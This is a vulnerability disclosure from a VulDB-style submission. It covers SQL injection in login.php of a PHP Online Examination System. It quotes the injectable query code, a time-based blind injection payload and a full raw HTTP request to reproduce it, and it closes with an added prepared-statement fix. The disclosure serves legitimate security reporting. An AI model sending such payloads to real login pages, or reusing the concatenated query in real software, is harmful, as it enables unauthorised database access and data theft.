Submission #847385: SQL Injection Vulnerability in `login.php` of the Online Examination System v1.0 SQL Injection (info)

Title: SQL Injection Vulnerability in `login.php` of the Online Examination System v1.0 SQL Injection
Description:

# SQL Injection Vulnerability in `login.php` of the Online Examination System

The user login function of the Online Examination System is handled by `login.php`. The login form in `index.php:396` sends a `POST` request to `login.php?q=index.php`. In the backend code, `login.php:8` and `login.php:9` directly read the `email` and `password` parameters from user input, and `login.php:12` concatenates the `email` parameter into the SQL query:

```php
$email = $_POST['email'];
$password = $_POST['password'];
$password=md5($password);
$result = mysqli_query($con,"SELECT name FROM user WHERE email = '$email' and password = '$password'") or die('Error');
```

Although the password is hashed with MD5 before the query is executed, the `email` parameter is not filtered or parameterized. As a result, an attacker can inject malicious SQL through `email`, causing a SQL injection vulnerability. Based on the provided request packet, this issue can be reproduced as a time-based blind SQL injection.

## Impact of the SQL Injection Vulnerability

An attacker can use this vulnerability to probe the database through the user login interface and confirm whether SQL injection is present. Once confirmed, the attacker may further attempt authentication bypass, extract sensitive data, enumerate tables and columns, or target user account information stored in the system. In practice, this can affect the confidentiality and integrity of exam-related user data.

## Payload

Injection parameter: `email`

Injected value:

```text
[email protected]'and(select*from(select+sleep(2))a/**/union/**/select+1)='
```

Request method: `POST`

Request path: `/login.php?q=index.php`

Raw request:

```http
POST /login.php?q=index.php HTTP/1.1
Host: project1
Content-Length: 92
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Edg/x.x.x.x
Origin: http://project1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://project1/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=2347fp9qoucglmem34csap1fbp
Connection: keep-alive

[email protected]'and(select*from(select+sleep(2))a/**/union/**/select+1)='&password=head
```

If the application response is delayed by about 2 seconds after sending the request, it indicates that the `email` parameter is likely vulnerable to time-based blind SQL injection.

## Sources Download

```
[Online Examination In PHP With Source Code - Source Code & Projects](https://code-projects.org/online-examination-in-php-with-source-code/)
```
Source: ⚠️ https://github.com/zzzxc643/CVE1/blob/main/project1/vul2.md
User: SSL_Seven_Security_Lab_WangZhiQiang_ZhanXiuChen (UID 97200)
Submission: 2026-06-04 05:57 (1 month ago)
Moderation: 2026-07-04 07:55 (1 month later)
Status: Duplicate
VulDB entry: 342838 [code-projects Online Examination System 1.0 Login Page /index.php user SQL injection]
Points: 0
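
A hardened form of the `login.php` query quoted in the description above, written here as an added example; it is not part of the submission or the project's code. It assumes `$con` is the application's existing `mysqli` connection and that the `user` table stores MD5 hashes as the original query implies; `find_user_name()` is a hypothetical helper name.

```php
<?php
declare(strict_types=1);

// Make mysqli throw exceptions instead of failing silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Returns the user's name on a credential match, or null otherwise.
 * Hypothetical helper; $con is assumed to be the app's mysqli connection.
 */
function find_user_name(mysqli $con, string $email, string $password): ?string
{
    // Defence in depth: reject values that are not syntactically valid
    // addresses before touching the database. This is not the primary fix.
    if (strlen($email) > 254 || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    // Unchanged from login.php so that existing stored hashes still match.
    $hash = md5($password);

    // Placeholders keep both values out of the SQL text, so quotes or
    // SQL keywords inside $email are compared as plain data.
    $stmt = $con->prepare('SELECT name FROM user WHERE email = ? AND password = ?');
    $stmt->bind_param('ss', $email, $hash);
    $stmt->execute();
    $stmt->bind_result($name);
    $found = $stmt->fetch(); // true = row fetched, null = no matching row
    $stmt->close();

    return $found === true ? (string) $name : null;
}

// Replacement for login.php lines 8-12: accept only string parameters.
$email    = is_string($_POST['email'] ?? null) ? $_POST['email'] : '';
$password = is_string($_POST['password'] ?? null) ? $_POST['password'] : '';

try {
    $name = find_user_name($con, $email, $password);
} catch (mysqli_sql_exception $e) {
    // Log details server-side; return only a generic error to the client.
    error_log('login query failed: ' . $e->getMessage());
    http_response_code(500);
    exit('Error');
}
```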
